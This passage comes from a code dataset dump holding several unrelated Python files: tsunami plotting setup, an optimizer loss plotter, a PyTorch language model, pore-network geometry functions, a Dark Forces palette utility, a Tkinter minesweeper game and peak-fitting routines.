masked_inner_product\n plotitem.pcolor_cmap = colormaps.white_red\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 0.005\n #plotitem.pcolor_cmax = 0.00001 # use for adjoint-error 
flagging\n\n plotitem.add_colorbar = False # doesn't work when adjoint all masked\n plotitem.colorbar_shrink = 0.75\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.amr_data_show = [1,1,0] # inner product not computed on finest level\n plotitem.patchedges_show = 0\n\n # Land\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.land\n plotitem.pcolor_cmap = geoplot.land_colors\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 100.0\n plotitem.add_colorbar = False\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.patchedges_show = 0\n plotaxes.xlimits = [-120,-60]\n plotaxes.ylimits = [-60,0]\n\n\n #-----------------------------------------\n # Figures for gauges\n #-----------------------------------------\n plotfigure = plotdata.new_plotfigure(name='Surface at gauges', figno=300, \\\n type='each_gauge')\n plotfigure.clf_each_gauge = True\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'Surface'\n\n # Plot surface as blue curve:\n plotitem = plotaxes.new_plotitem(plot_type='1d_plot')\n plotitem.plot_var = 3\n plotitem.plotstyle = 'b-'\n\n # Plot topo as green curve:\n plotitem = plotaxes.new_plotitem(plot_type='1d_plot')\n plotitem.show = False\n\n def gaugetopo(current_data):\n q = current_data.q\n h = q[0,:]\n eta = q[3,:]\n topo = eta - h\n return topo\n \n plotitem.plot_var = gaugetopo\n plotitem.plotstyle = 'g-'\n\n def add_zeroline(current_data):\n from pylab import plot, legend, xticks, floor, axis, xlabel\n t = current_data.t \n gaugeno = current_data.gaugeno\n\n if gaugeno == 32412:\n try:\n plot(TG32412[:,0], TG32412[:,1], 'r')\n legend(['GeoClaw','Obs'],loc='lower right')\n except: pass\n axis((0,t.max(),-0.3,0.3))\n\n plot(t, 0*t, 'k')\n n = int(floor(t.max()/3600.) 
+ 2)\n xticks([3600*i for i in range(n)], ['%i' % i for i in range(n)])\n xlabel('time (hours)')\n\n plotaxes.afteraxes = add_zeroline\n\n\n\n #-----------------------------------------\n \n # Parameters used only when creating html and/or latex hardcopy\n # e.g., via pyclaw.plotters.frametools.printframes:\n\n plotdata.printfigs = True # print figures\n plotdata.print_format = 'png' # file format\n plotdata.print_framenos = 'all' # list of frames to print\n plotdata.print_gaugenos = 'all' # list of gauges to print\n plotdata.print_fignos = 'all' # list of figures to print\n plotdata.html = True # create html files of plots?\n plotdata.html_homelink = '../README.html' # pointer for top of index\n plotdata.latex = True # create latex file of plots?\n plotdata.latex_figsperline = 2 # layout of plots\n plotdata.latex_framesperline = 1 # layout of plots\n plotdata.latex_makepdf = False # also run pdflatex?\n plotdata.parallel = True # make multiple frame png's at once\n\n return plotdata\n\n","sub_path":"tests/chile2010_adjoint/setplot.py","file_name":"setplot.py","file_ext":"py","file_size_in_byte":7750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622548346","text":"#!/usr/bin/env python3\n\nimport csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\nimport numpy as np\n\nWALL = 'Wall time'\nSTEP = 'Step'\nVALUE = 'Value'\n\nplt.style.use('ggplot')\n\ndef key(rule):\n if rule == 'SGDMomentum': return 'momentum'\n elif rule == 'SGDNesterovMomentum': return 'nesterov'\n else: return rule.lower()\n\ndef file_name(rule, rate=None):\n if rate is not None:\n return \"{}_loss_{}.csv\".format(key(rule), rate)\n else:\n return \"{}_decay_loss.csv\".format(key(rule))\n\ndef rate_legend(name):\n rule = key(name)\n val = name.split('_')[-1].split('.')[0]\n return rule + ' ' + val[:1] + '.' 
+ val[1:]\n\ndef best_rates():\n return {\n \"Adadelta\" : \"001\",\n \"Adagrad\" : \"001\",\n \"Adam\" : \"00001\",\n \"Adamax\" : \"0001\",\n \"AMSgrad\" : \"00001\",\n \"Eve\" : \"00001\",\n \"RMSprop\" : \"00001\",\n \"SGD\" : \"001\",\n # \"SGDMomentum\" : \"001\",\n \"SGDNesterovMomentum\" : \"001\",\n }\n\ndef plot_vloss():\n fig = plt.figure()\n ax = fig.add_subplot(111)\n legends = []\n\n rates = best_rates()\n for rule in rates:\n frame = pd.read_csv(file_name(rule))\n ax.plot(frame[STEP][::5], frame[VALUE][::5])\n legends.append(rule)\n ax.legend(legends)\n ax.set_ylabel('Validation Loss')\n ax.set_xlabel('Training Step')\n plt.show()\n # plt.savefig('resnet_loss.pdf')\n \nif __name__ == \"__main__\":\n plot_vloss()\n","sub_path":"resnet-data/plot_vloss.py","file_name":"plot_vloss.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442963563","text":"import torch.nn as nn\r\nimport torch\r\n\r\nclass NNModel(nn.Module):\r\n\r\n\t# def __init__(self, ntoken, embed_size, nhid, seq_len, initrange):\r\n\tdef __init__(self, ntoken, embed_size, nhid, seq_len, initrange, batch_size):\r\n\t\tsuper(NNModel, self).__init__()\r\n\t\tself.encoder = nn.Embedding(ntoken, embed_size) # ntoken - |V|, embed_size - pocet features\r\n\t\t\r\n\t\tself.emb2hid = nn.Linear(embed_size*seq_len, nhid)\r\n\t\tself.actF = nn.Tanh()\r\n\r\n\t\tself.decoder = nn.Linear(nhid, ntoken)\r\n\r\n\t\tself.initrange = initrange\r\n\t\tself.init_weights()\r\n\t\t\r\n\t\tself.Lsoftmax = nn.LogSoftmax(1)\r\n\t\tself.batch_size = batch_size\r\n\t\t\r\n\tdef init_weights(self):\r\n\t\tself.encoder.weight.data.uniform_(-self.initrange, self.initrange)\r\n\t\tself.decoder.bias.data.fill_(0)\r\n\t\tself.decoder.weight.data.uniform_(-self.initrange, self.initrange)\r\n\t\tself.emb2hid.weight.data.uniform_(-self.initrange, self.initrange)\r\n\r\n\tdef forward(self, input):\r\n\t\temb = self.encoder(input)# emb - [2][32][150] 150 features pre 2 slov, input - 2 x index\r\n\r\n\t\temb = torch.cat(torch.split(emb, 1), 2) # [1][32][300]\r\n\t\temb = emb.view(self.batch_size, -1) # [32][300]\r\n\r\n\t\toutput = self.emb2hid(emb)\r\n\t\toutput = self.actF(output)\r\n\r\n\t\toutput = self.decoder(output) # [32][|V|]\r\n\t\toutput = self.Lsoftmax(output)\r\n\t\treturn output # logsoftmax pre pravdepodobnosti\r\n","sub_path":"model_tanh.py","file_name":"model_tanh.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380724841","text":"r\"\"\"\n===============================================================================\nSubmodule -- throat_surface_area\n===============================================================================\n\n\"\"\"\nimport scipy as _sp\n\n\ndef cylinder(geometry, throat_diameter='throat.diameter',\n throat_length='throat.length', **kwargs):\n r\"\"\"\n Calculate throat area for a cylindrical throat\n \"\"\"\n D = geometry[throat_diameter]\n L = geometry[throat_length]\n value = _sp.constants.pi*D*L\n return value\n\n\ndef cuboid(geometry, throat_diameter='throat.diameter',\n throat_length='throat.length', **kwargs):\n r\"\"\"\n Calculate throat area for a cuboid throat\n \"\"\"\n D = geometry[throat_diameter]\n L = geometry[throat_length]\n value = 4*D*L\n return value\n\n\ndef extrusion(geometry, throat_perimeter='throat.perimeter',\n throat_length='throat.length', **kwargs):\n r\"\"\"\n Calculate surface area from 
perimeter and length -\n perimeter calculated when throat area is calculated so must be run in\n correct order\n \"\"\"\n P = geometry[throat_perimeter]\n L = geometry[throat_length]\n value = P*L\n return value\n","sub_path":"OpenPNM/Geometry/models/throat_surface_area.py","file_name":"throat_surface_area.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211273380","text":"\"\"\"\nStar Wars Dark Forces color palette functions.\n\nA Dark Forces color palette is a VGA Mode 13h palette.\n\nVGA Mode 13h is limited to 256 colors at 6-bits per channel, so each\nchannel ranges from 0-63 inclusive.\n\nDark Forces treats color 0 as transparent. All others are opaque.\n\"\"\"\nimport struct\n\n# The number of colors present in a palette.\nNUM_COLORS = 256\n\n# The number of channels per color. (RGB)\nNUM_CHANNELS = 3\n\n# The palette color that represents transparency.\nTRANSPARENT_COLOR = 0\n\n\ndef read(filename):\n \"\"\"\n Reads a VGA Mode 13h palette from a file.\n\n :param filename: The palette to read.\n :return: A list of RGB tuples.\n \"\"\"\n palette = []\n\n with open(filename, \"rb\") as file:\n for color in range(NUM_COLORS):\n r = struct.unpack(\"B\", file.read(1))[0]\n g = struct.unpack(\"B\", file.read(1))[0]\n b = struct.unpack(\"B\", file.read(1))[0]\n palette.append((r, g, b))\n\n return palette\n\n\ndef write(filename, vga13h_palette):\n \"\"\"\n Writes a VGA Mode 13h palette to a file.\n\n :param filename: The file to write to.\n :param vga13h_palette: The palette to write.\n :return: None\n \"\"\"\n with open(filename, \"wb\") as file:\n for color in range(NUM_COLORS):\n file.write(struct.pack(\"B\", vga13h_palette[color][0]))\n file.write(struct.pack(\"B\", vga13h_palette[color][1]))\n file.write(struct.pack(\"B\", vga13h_palette[color][2]))\n\n\ndef is_vga13h_palette(vga13h_palette):\n \"\"\"\n Checks if a palette is a valid VGA Mode 13h palette.\n\n :param vga13h_palette: The palette to validate.\n :return: bool\n \"\"\"\n # 256 colors.\n if len(vga13h_palette) != NUM_COLORS:\n return False\n\n for color in range(NUM_COLORS):\n # RGB\n if len(vga13h_palette[color]) != NUM_CHANNELS:\n return False\n # VGA Mode 13h. 6-bits per channel.\n if not ((0 <= vga13h_palette[color][0] < 2 ** 6) and\n (0 <= vga13h_palette[color][1] < 2 ** 6) and\n (0 <= vga13h_palette[color][2] < 2 ** 6)):\n return False\n\n return True\n\n\ndef vga13h_to_rgb(vga13h_palette):\n \"\"\"\n Converts a VGA Mode 13h palette to an 8-bit RGB palette.\n\n :param vga13h_palette: The palette to convert.\n :return: A list of 8-bit RGB tuples.\n \"\"\"\n rgb_palette = []\n\n for color in range(NUM_COLORS):\n rgb_palette.append((vga13h_palette[color][0] << 2,\n vga13h_palette[color][1] << 2,\n vga13h_palette[color][2] << 2))\n\n return rgb_palette\n\n\ndef vga13h_to_rgba(vga13h_palette):\n \"\"\"\n Converts a VGA Mode 13h palette to an 8-bit RGBA palette.\n Only color 0 is transparent. 
All others are opaque.\n\n :param vga13h_palette: The palette to convert.\n :return: A list of 8-bit RGBA tuples.\n \"\"\"\n rgba_palette = []\n\n for color in range(NUM_COLORS):\n # Color 0 is transparent.\n if color == TRANSPARENT_COLOR:\n rgba_palette.append((vga13h_palette[color][0] << 2,\n vga13h_palette[color][1] << 2,\n vga13h_palette[color][2] << 2, 0))\n # Other colors are opaque.\n else:\n rgba_palette.append((vga13h_palette[color][0] << 2,\n vga13h_palette[color][1] << 2,\n vga13h_palette[color][2] << 2, 255))\n\n return rgba_palette\n\n\ndef rgb_to_vga13h(rgb_palette):\n \"\"\"\n Converts an 8-bit RGB palette to a VGA Mode 13h palette.\n\n :param rgb_palette: The palette to convert.\n :return: A list of 6-bit RGBA tuples.\n \"\"\"\n vga13h_palette = []\n\n for color in range(NUM_COLORS):\n vga13h_palette.append((rgb_palette[color][0] >> 2,\n rgb_palette[color][1] >> 2,\n rgb_palette[color][2] >> 2))\n\n return vga13h_palette\n\n\ndef rgba_to_vga13h(rgba_palette):\n \"\"\"\n Converts an 8-bit RGBA palette to a VGA Mode 13h palette. Transparency\n is discarded. Only color 0 is transparent. All others are opaque.\n\n :param rgba_palette: The palette to convert.\n :return: A list of 6-bit RGB tuples.\n \"\"\"\n # Cannot encode alpha in palette.\n return rgb_to_vga13h(rgba_palette)\n","sub_path":"formats/pal.py","file_name":"pal.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237254563","text":"import tkinter as tk\r\nimport random\r\nfrom tkinter import messagebox\r\n\r\ncnt = 0 #다양한 카운트에 사용될 변수\r\nbomb = 0 # 폭탄 갯수\r\nflag = 0 # 깃발 갯수\r\nButtonchk = [] # 버튼이 체크된 상태인지 아닌지 판별하는 리스트\r\nButton_X = [] # 버튼의 플래그가 됬는지 아닌지 판별하는 리스트\r\nvisit = [[0 for col in range(0)] for row in range(0)] #주변의 0을 찾는 함수에서 사용되는 리스트, 이미 찾은 위치를 표시하기 위하여 사용된다.\r\nButton_map=[] # 화면에 보여질 버튼리스트\r\nMap=[] # 버튼의 실제 값(지뢰인지, 주변의 지뢰가 몇개인지)\r\nX=0 #행\r\nY=0 #열\r\n\r\n#visit 리스트를 초기화시켜주는 함수\r\ndef clear() : \r\n for i in range(X) :\r\n for j in range(Y):\r\n visit[i][j]=0 \r\n\r\n#해당 버튼의 정보를 보여주는 함수\r\ndef Show(self,x1,y1):\r\n self.Num_Button.configure(text = str(Map[x1][y1]))\r\n\r\n#게임을 시작 및 종료하는 클래스\r\nclass Game(tk.Frame) :\r\n\r\n #생성자\r\n def __init__(self, master):\r\n super(Game,self).__init__(master)\r\n self.begin1() #초기는 9X9 실행\r\n self.label=\" \"\r\n menubar = tk.Menu(master) #Menu 생성\r\n filemenu = tk.Menu(menubar, tearoff=0)\r\n filemenu.add_command(label=\"9*9\", command = self.begin1) #9x9\r\n filemenu.add_command(label=\"16*16\", command = self.begin2) #16x16\r\n filemenu.add_command(label=\"30*16\", command = self.begin3) #30*16\r\n filemenu.add_separator()\r\n filemenu.add_command(label=\"Exit\", \r\n command=master.destroy)\r\n menubar.add_cascade(label=\"Menu\", menu=filemenu)\r\n master.config(menu=menubar)\r\n \r\n def begin1(self): #9x9\r\n global X,Y #x축, y축\r\n global bomb #지뢰의 갯수\r\n global flag #flag의 갯수\r\n global visit #find에 사용될 리스트\r\n global Map #버튼의 실제값 -> 지뢰인지 아닌지/ 지뢰면 -1, 지뢰가 아니면 주변의 지뢰 갯수\r\n global Button_map #디스플레이에 사용되는 리스트\r\n global Buttonchk #버튼이 체크되었는지 확인하기 위한 리스트\r\n global Button_X #버튼에 플래그가 활성화되었는지 확인하기 위한 리스트\r\n \r\n #이전에 있던 객체를 초기화시킨다.\r\n for button in Button_map:\r\n for i in button:\r\n i.delete()\r\n X=9 #x=9\r\n Y=9 #y=9\r\n bomb=10 #지뢰=10개\r\n flag=bomb #플래그 수는 지뢰수와 같도록 설정\r\n\r\n #필요한 리스트 초기화\r\n visit= [[0 for col in range(Y)] for row in range(X)]\r\n Map = [[0 for col in range(Y)] for row in range(X)]\r\n Button_X=[[0 for col in range(Y)] for row in 
range(X)]\r\n Buttonchk=[[0 for col in range(Y)] for row in range(X)]\r\n Button_map=[[Button(0,0) for col in range(Y)] for row in range(X)]\r\n \r\n #각 버튼에 정보를 넣어준다.\r\n for i in range(X) :\r\n for j in range(Y) :\r\n Button_map[i][j]=Button(i,j)\r\n \r\n clear() #visit 리스트 초기화\r\n set_mine(X,Y) #마인 세팅\r\n mine_number(X,Y) #숫자 세팅\r\n\r\n \r\n\r\n def begin2(self):\r\n global X,Y #x축, y축\r\n global bomb #지뢰의 갯수\r\n global flag #flag의 갯수\r\n global visit #find에 사용될 리스트\r\n global Map #버튼의 실제값 -> 지뢰인지 아닌지/ 지뢰면 -1, 지뢰가 아니면 주변의 지뢰 갯수\r\n global Button_map #디스플레이에 사용되는 리스트\r\n global Buttonchk #버튼이 체크되었는지 확인하기 위한 리스트\r\n global Button_X #버튼에 플래그가 활성화되었는지 확인하기 위한 리스트\r\n \r\n #이전에 있던 객체를 삭제한다.\r\n for button in Button_map:\r\n for i in button:\r\n i.delete()\r\n X=16 #x=16\r\n Y=16 #y=16\r\n bomb=50 #지뢰=50개\r\n flag=bomb #플래그 수는 지뢰 수와 같도록 설정\r\n\r\n #필요리스트 초기화\r\n visit= [[0 for col in range(Y)] for row in range(X)]\r\n Map = [[0 for col in range(Y)] for row in range(X)]\r\n Button_X=[[0 for col in range(Y)] for row in range(X)]\r\n Buttonchk=[[0 for col in range(Y)] for row in range(X)]\r\n Button_map=[[Button(0,0) for col in range(Y)] for row in range(X)]\r\n \r\n #각 버튼에 정보를 넣어준다.\r\n for i in range(X) :\r\n for j in range(Y) :\r\n Button_map[i][j]=Button(i,j)\r\n \r\n clear() #visit list 초기화\r\n set_mine(X,Y) #마인 세팅\r\n mine_number(X,Y) #숫자 세팅\r\n\r\n def begin3(self):\r\n global X,Y #x축, y축\r\n global bomb #지뢰의 갯수\r\n global flag #flag의 갯수\r\n global visit #find에 사용될 리스트\r\n global Map #버튼의 실제값 -> 지뢰인지 아닌지/ 지뢰면 -1, 지뢰가 아니면 주변의 지뢰 갯수\r\n global Button_map #디스플레이에 사용되는 리스트\r\n global Buttonchk #버튼이 체크되었는지 확인하기 위한 리스트\r\n global Button_X #버튼에 플래그가 활성화되었는지 확인하기 위한 리스트\r\n for item in Button_map:\r\n for i in item:\r\n i.delete()\r\n X=30 #x=30\r\n Y=16 #y=16\r\n bomb=99 #지뢰=99\r\n flag=bomb #플래그 수는 지뢰수와 같도록 설정\r\n\r\n #필요리스트 초기화\r\n visit= [[0 for col in range(Y)] for row in range(X)]\r\n Map = [[0 for col in range(Y)] for row in range(X)]\r\n Button_X=[[0 for col in range(Y)] for row in range(X)]\r\n Buttonchk=[[0 for col in range(Y)] for row in range(X)]\r\n Button_map=[[Button(0,0) for col in range(Y)] for row in range(X)]\r\n \r\n #각 버튼에 정보를 넣어준다.\r\n for i in range(X) :\r\n for j in range(Y) :\r\n Button_map[i][j]=Button(i,j)\r\n \r\n clear() #visit list 초기화\r\n set_mine(X,Y) #마인 세팅\r\n mine_number(X,Y) #숫자 세팅\r\n\r\n#Button의 정보를 관리하는 클래스\r\nclass Button :\r\n #변수 선언 및 지역변수 활용\r\n global cnt\r\n global Map\r\n global bomb\r\n global flag\r\n \r\n #생성자\r\n def __init__(self, x,y):\r\n self.button_x=x\r\n self.button_y=y\r\n self.Num_Button=tk.Button(root,width=5,background='darkgray') #색상 설정\r\n self.Num_Button.grid(row=y, column=x, ipady = 5) # 맵 크기 설정\r\n self.Num_Button.bind('', self.Left) #왼쪽 클릭일 때 Left함수 실행\r\n self.Num_Button.bind('', self.Right) #오른쪽 클릭 일 때 Right함수 실행\r\n \r\n #버튼의 정보를 보여주는 함수\r\n def show(self,x,y):\r\n self.Num_Button.configure(text = str(Map[x][y]))\r\n \r\n #버튼 객체를 삭제하는 함수\r\n def delete(self): \r\n self.Num_Button.grid_forget() \r\n\r\n #왼쪽클릭 시 동작하는 함수\r\n def Left(self,event):\r\n #버튼에 플래그가 없을 때 동작\r\n if(Button_X[self.button_x][self.button_y]==0):\r\n #버튼이 지뢰일 경우\r\n if(Map[self.button_x][self.button_y]==-1):\r\n #게임 종료\r\n Game_over()\r\n #버튼이 0일 경우 \r\n elif(Map[self.button_x][self.button_y]==0):\r\n #버튼의 정보를 보여준다.\r\n Button_map[self.button_x][self.button_y].show(self.button_x,self.button_y)\r\n #주변의 0을 찾아서 열어준다.\r\n find_zero(self.button_x,self.button_y) \r\n #버튼이 클릭되었다는 것을 체크한다.\r\n Buttonchk[self.button_x][self.button_y]=1\r\n \r\n #버튼이 0,-1이 아닌 나머지의 
경우\r\n else :\r\n #버튼의 정보를 보여준다.\r\n Button_map[self.button_x][self.button_y].show(self.button_x,self.button_y)\r\n #버튼이 클릭되었다는 것을 체크한다.\r\n Buttonchk[self.button_x][self.button_y]=1\r\n \r\n \r\n #플래그가 다 표시 되었을 때\r\n if (flag == 0):\r\n #카운트를 해주기 위한 변수 초기화\r\n cnt = 0 \r\n for i in range(X):\r\n for j in range(Y):\r\n #버튼이 체크되어있고, 지뢰가 아닐경우\r\n if (Buttonchk[i][j] == 1 and not Map[i][j] == -1):\r\n #카운트 증가\r\n cnt += 1\r\n #카운트가 전체에서 지뢰의 갯수를 뺀 값과 같을 때\r\n if cnt == X*Y-bomb:\r\n #게임 클리어\r\n Game_clear()\r\n \r\n #오른쪽 클릭일 때 동작하는 함수\r\n def Right(self,event):\r\n #flag변수 선언 및 지역변수 활용\r\n global flag\r\n #버튼에 플래그가 없고, 버튼이 체크되어있지 않은 경우\r\n if(not Button_X[self.button_x][self.button_y]==1 and Buttonchk[self.button_x][self.button_y]==0):\r\n #플래그의 갯수가 0이 아닐 때까지\r\n if(flag>0):\r\n #플래그 할 버튼을 빨간색으로 변경\r\n Button_map[self.button_x][self.button_y].Num_Button[\"bg\"]=\"red\"\r\n #버튼이 플래그 되어있음을 체크\r\n Button_X[self.button_x][self.button_y]=1\r\n #남은 플래그 가능 횟수 감소\r\n flag-=1\r\n #버튼이 플래그가 이미 되어있는 경우\r\n elif(Button_X[self.button_x][self.button_y] == 1):\r\n #버튼을 원래 색깔로 변경\r\n Button_map[self.button_x][self.button_y].Num_Button[\"bg\"] = \"darkgrey\"\r\n #버튼의 플래그 체크를 해제\r\n Button_X[self.button_x][self.button_y] = 0\r\n #남은 플래그 가능 횟수 증가\r\n flag += 1\r\n\r\n #플래그를 다 체크하였을 경우\r\n if (flag == 0):\r\n #카운트 변수 초기화\r\n cnt = 0\r\n for i in range(X):\r\n for j in range(Y):\r\n if (Button_X[i][j]==1):\r\n cnt += 1\r\n #지뢰갯수와 플래그의 갯수가 같을 때\r\n if cnt == bomb :\r\n Game_clear()\r\n\r\n#주변의 0을 찾는 함수\r\ndef find_zero(x,y):\r\n\r\n dir = [[0,1],[0,-1],[1,0],[-1,0]] #움직일 방향을 위한 리스트\r\n global Map #실제 정보를 저장한 map 리스트\r\n global Buttonchk #버튼이 클릭되었는지 확인하기 위한 리스트\r\n global Button_X #플래그가 되어있는지 확인하기 위한 리스트\r\n global X #행\r\n global Y #열\r\n\r\n #버튼이 행의 범위를 벗어났을 경우\r\n if(x < 0 or x >= X): \r\n return 0\r\n #버튼이 열의 범위를 벗어났을 경우\r\n if(y < 0 or y >= Y): \r\n return 0\r\n\r\n #버튼이 체크되어 있거나 플래그가 되어있을 때 탐색 종료\r\n if(Buttonchk[x][y]==1 or Button_X[x][y]==1):\r\n return 0\r\n \r\n #처음 방문하는 버튼일 경우 \r\n if visit[x][y] == 0:\r\n #방문했음을 체크\r\n visit[x][y] = 1\r\n #버튼이 0일 경우\r\n if Map[x][y] == 0:\r\n #버튼의 정보를 보여주고, 체크되었음을 표시\r\n Button_map[x][y].show(x,y)\r\n Buttonchk[x][y] = 1\r\n #버튼이 0보다 클경우\r\n elif Map[x][y] > 0:\r\n #버튼의 정보를 보여주고, 체크되었음을 표시 후 탐색 종료\r\n Button_map[x][y].show(x,y)\r\n Buttonchk[x][y] = 1\r\n return 0\r\n #위/아래/오른쪽/왼쪽으로 탐색을 반복\r\n for i in range(4):\r\n find_zero(x+dir[i][0],y+dir[i][1])\r\n #이미 방문한 버튼일 경우 탐색 종료\r\n else :\r\n return 0\r\n\r\n \r\n\r\n#주위의 지뢰 갯수를 리턴\r\ndef count_bomb(x,y,X,Y):\r\n #객체 생성 및 지역변수 활용\r\n global Map\r\n global cnt\r\n cnt=0\r\n\r\n for i in range(-1,2):\r\n for j in range(-1,2): \r\n #범위를 벗어나는 경우 넘겨준다.\r\n if x+i < 0: \r\n continue\r\n if X-1 parameters are [(a1, a2), ]\n# function b -> parameters are [(b1, b2, b3), ]\n#\n# note the 1-element list\n# it allows to simply write `param_a+b = param_a + param_b`\n# when two functions are added\n#\n# Sum(f_a, f_b) -> parameters are [(a1, a2), (b1, b2, b3)]\n#\n# `estimate_param` returns a flattened version of the parameter\n# (a1, a2, b1, b2 b3)\n#\n# -\n\nclass Linear:\n \"\"\"Linear function\"\"\"\n def __init__(self, slope=None, intercept=None):\n self.slope_init = slope\n self.intercept_init = intercept\n self.param_names = [('slope', 'intercept'), ]\n self.name = ['Linear', ]\n\n def __call__(self, x, slope, intercept):\n return x*slope + intercept\n\n def estimate_param(self, x, y):\n if not self.slope_init:\n self.slope_init = (y[-1] - y[0])/(x[-1] - x[0])\n if not self.intercept_init:\n self.intercept_init = y[0] - 
self.slope_init*x[0]\n\n return self.slope_init, self.intercept_init\n\n\nclass Gauss:\n \"\"\"Gaussian function\"\"\"\n def __init__(self, x0=None, fwhm=None, ampl=None):\n self.x0_init = x0\n self.fwhm_init = fwhm\n self.amplitude_init = ampl\n self.param_names = [('x0', 'fwhm', 'amplitude'), ]\n self.name = ['Gaussian', ]\n\n def __call__(self, x, x0, fwhm, amplitude):\n sigma = fwhm /( 2*np.sqrt(2*np.log(2)) )\n return amplitude * np.exp( -(x-x0)**2/(2*sigma**2) )\n\n def estimate_param(self, x, y):\n if not self.x0_init:\n self.x0_init = x[np.argmax(y)]\n if not self.fwhm_init:\n self.fwhm_init = np.ptp( x[ y > (y.min() + y.max())/2 ] )\n if not self.amplitude_init:\n self.amplitude_init = np.ptp(y)\n\n return self.x0_init, self.fwhm_init, self.amplitude_init\n\n\nclass Lorentzian:\n \"\"\"Lorentzian function (or Cauchy distribution)\n\n I = 1/( 1 + x^2 )\n \"\"\"\n def __init__(self, x0=None, fwhm=None, ampl=None):\n self.x0_init = x0\n self.fwhm_init = fwhm\n self.amplitude_init = ampl\n self.param_names = [('x0', 'fwhm', 'amplitude'), ]\n self.name = ['Lorentzian', ]\n\n def __call__(self, x, x0, fwhm, amplitude):\n hwhm = fwhm / 2\n u = x - x0\n return amplitude/( 1 + (u/hwhm)**2 )\n\n def estimate_param(self, x, y):\n if not self.x0_init:\n self.x0_init = x[np.argmax(y)]\n if not self.fwhm_init:\n self.fwhm_init = np.ptp( x[ y > (y.min() + y.max())/2 ] )\n if not self.amplitude_init:\n self.amplitude_init = np.ptp(y)\n\n return self.x0_init, self.fwhm_init, self.amplitude_init\n\n\nclass PseudoVoigt:\n \"\"\"PseudoVoigt function\n\n approximation of the Voigt function\n weighted sum of Gaussian and Lorentzian function\n\n PV(x) = eta*G(x) + (1-eta)*L(x)\n\n # see:\n # https://docs.mantidproject.org/nightly/fitting/fitfunctions/PseudoVoigt.html\n \"\"\"\n def __init__(self, x0=None, fwhm=None, ampl=None, eta=None):\n self.x0_init = x0\n self.fwhm_init = fwhm\n self.amplitude_init = ampl\n self.eta_init = eta\n self.param_names = [('x0', 'fwhm', 'amplitude', 'eta'), ]\n self.name = ['PseudoVoigt', ]\n\n def __call__(self, x, x0, fwhm, amplitude, eta):\n hwhm = fwhm / 2\n u = x - x0\n\n L = hwhm/(u**2 + hwhm**2)/np.pi\n\n sigma = hwhm / np.sqrt(2*np.log(2))\n norm_G = 1/(sigma * np.sqrt(2*np.pi))\n G = norm_G * np.exp( -(x-x0)**2/(2*sigma**2) )\n\n I = amplitude*np.pi*hwhm/(1 + eta*(np.sqrt(np.pi*np.log(2)) - 1))\n return ( eta*G + (1 - eta)*L ) * I\n\n def estimate_param(self, x, y):\n if not self.x0_init:\n self.x0_init = x[np.argmax(y)]\n if not self.fwhm_init:\n self.fwhm_init = np.ptp( x[ y > (y.min() + y.max())/2 ] )\n if not self.amplitude_init:\n self.amplitude_init = np.ptp(y)\n if not self.eta_init:\n self.eta_init = 0.5\n\n return self.x0_init, self.fwhm_init, \\\n self.amplitude_init, self.eta_init\n\n\nclass Sum:\n \"\"\"Build a new function as the sum of two functions\"\"\"\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n # param are list of list\n self.param_names = a.param_names + b.param_names\n self.name = (*a.name, *b.name)\n\n def __call__(self, x, *p):\n nargs_a = sum(len(u) for u in self.a.param_names)\n p_a = p[:nargs_a]\n p_b = p[nargs_a:]\n return self.a(x, *p_a) + self.b(x, *p_b)\n\n def estimate_param(self, x, y):\n p_a = self.a.estimate_param(x, y)\n p_b = self.b.estimate_param(x, y)\n return (*p_a, *p_b)\n\n\ndef peakfit(x, y, function=Gauss(), background=Linear()):\n \"\"\"Fit the data (x, y) using the provided function\n\n The background function is summed to the function\n - Default function is `Gauss()`\n - Default background is `Linear()`\n 
- Set to `̀None` if no background is wanted.\n\n Returns:\n - list of dictionary parameters (one for each function)\n - global fit function with optimal parameters\n \"\"\"\n\n if background is not None:\n function = Sum(function, background)\n\n p0 = function.estimate_param(x, y)\n\n popt, pcov = curve_fit(function, x, y, p0)\n parameter_err = np.sqrt(np.diag(pcov))\n\n result = []\n idx = 0\n for f_name, params in zip(function.name, function.param_names):\n res = {'function':f_name}\n for param in params:\n res[param] = popt[idx]\n res[param + '_std'] = parameter_err[idx]\n idx += 1\n\n result.append(res)\n\n return result, lambda x:function(x, *popt)\n\n\ndef results_summary(results):\n \"\"\"Generate text summary of the parameters\"\"\"\n max_length = max(len(k) for r in results for k in r.keys()\n if k != 'function' and 'std' not in k) + 1\n summary = ''\n for r in results:\n summary += r['function'] + '\\n'\n for name, value in r.items():\n if name == 'function' or 'std' in name:\n continue\n summary += f\" {name+':': <{max_length}}{value: 0.3f}\\n\"\n return summary\n\n\ndef plot_results(x, y,\n results=None, fit=None,\n save_path=None, save_name=None):\n \"\"\"Generate summary graph of fit results\"\"\"\n fig, ax = plt.subplots()\n ax.plot(x, y, '.k', label='data')\n if fit:\n ax.plot(x, fit(x), 'r-', label='fit')\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.legend()\n if results:\n ax.text(0.01, 0.99, results_summary(results),\n transform=ax.transAxes,\n fontfamily='monospace',\n verticalalignment='top')\n if save_name:\n ax.set_title(save_name)\n\n if save_path:\n if save_name:\n figname = save_name+'.png'\n else:\n hashvalues = list(f\"{k}_{str(v)[:5].replace('.', 'p')}\"\n for r in results for k, v in r.items()\n if k != 'function' and 'std' not in k)\n figname = 